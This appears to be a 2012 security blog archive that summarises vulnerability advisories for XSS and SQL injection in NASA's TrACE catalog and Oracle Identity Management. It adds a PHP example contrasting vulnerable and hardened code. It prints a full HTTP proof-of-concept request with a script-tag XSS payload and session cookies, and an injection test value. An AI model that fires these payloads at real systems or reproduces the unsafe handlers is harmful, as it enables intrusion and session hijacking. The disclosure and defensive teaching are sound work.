Archive for October, 2012

NASA Tri-Agency Climate Education (TrACE) Multiple Vulnerabilities

The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education.

The application suffers from a reflected cross-site scripting vulnerability: input passed to the ‘product_id’, ‘pi’, ‘project_id’ and ‘funder’ GET parameters of the ‘trace_results.php’ script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of an affected site. The application also suffers from SQL injection vulnerabilities: input passed to the ‘product_id’ and ‘grade’ GET parameters of the same script is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Advisories:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5112.php
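The two defect classes above, as a constructed PHP illustration added here (this is not the TrACE source; the table name, column names and function names are assumptions). The unsafe handlers reproduce the pattern the advisory describes, the hardened ones show the context-specific fix: HTML encoding at the point of output and a bound query parameter.

```php
<?php
// Constructed illustration of the two defects described above. It is not the
// TrACE source; the table name and column names are assumptions.
declare(strict_types=1);

// Reflected XSS pattern: a raw GET value is written straight into the HTML.
function render_unsafe(array $get): string
{
    return "<p>Results for product {$get['product_id']}</p>";
}

// Hardened: encode for the HTML context at the point of output.
function render_safe(array $get): string
{
    $pid = htmlspecialchars($get['product_id'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for product {$pid}</p>";
}

// SQL injection pattern: a GET value is concatenated into the query text, so a
// quote character in the input changes the statement itself.
function query_unsafe(PDO $db, array $get): array
{
    $sql = "SELECT product_id FROM products WHERE grade = '{$get['grade']}'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: a bound parameter keeps the input as data whatever it contains.
function query_safe(PDO $db, array $get): array
{
    $stmt = $db->prepare('SELECT product_id FROM products WHERE grade = :grade');
    $stmt->execute([':grade' => $get['grade']]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Demonstration against an in-memory SQLite table with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE products (product_id TEXT, grade TEXT)");
$db->exec("INSERT INTO products VALUES ('p1', '5'), ('p2', '6')");

$input = ['product_id' => '"><script>alert(\'XSS\');</script>', 'grade' => "5'"];
echo render_unsafe($input), "\n";  // the script element reaches the browser intact
echo render_safe($input), "\n";    // &quot;&gt;&lt;script&gt;... is shown as text
echo implode(',', query_safe($db, $input)), "\n"; // empty: no grade equals 5'
try {
    query_unsafe($db, $input);
} catch (PDOException $e) {
    echo "unsafe query broke: ", $e->getMessage(), "\n"; // the quote ended the literal early
}
```

Requires the pdo_sqlite extension; the same output-encoding rule applies to the POST ‘username’ reflection in the Oracle advisory below.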

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability

Oracle Identity Management suffers from a reflected XSS POST injection vulnerability: user input passed to the ‘username’ parameter via the POST method to the ‘/usermanagement/forgotpassword/index.jsp’ script is not properly sanitised before being returned to the user. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

HTTP Request Headers:
----------------------

POST /usermanagement/forgotpassword/index.jsp HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3
iTaN0Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; ORA_WX_SESSION="6F35B41473025957B17F02F62855B522D4E22D7B-1#2";
Location=external; portal=9.0.3+en-us+us+AMERICA+CACA1F130AE0024EE043996B1DDC024E+
4D3F611B686669BF0BEC9DC4267652AC337EA1C5259A2168CF43540DE72E3BD5E
F1F589B40A6CD4E7007EB4D085EBD0681A1B2515CB22B5BED14922088
923D86B742E69FDA5D716C437D416C5F5B26049DC71083712AA9EA;
MODPLSQL_TRC=ReqId:11a179::PID:856d5bb0

btnSubmit=SUBMIT
username="><script>alert('XSS');</script>

HTTP Response Headers:
-----------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ORA_WX_SESSION="267FB4CAD2746E946102C01D527362A070E7D52C-1#2"; path=/
JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3iTaN0
Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; path=/usermanagement; secure
Location=external;path=/;
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.2.1 (N;ecid=216172960764121113,1)
Content-Length: 3198
Date: Fri, 28 Sep 2012 21:39:00 GMT

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php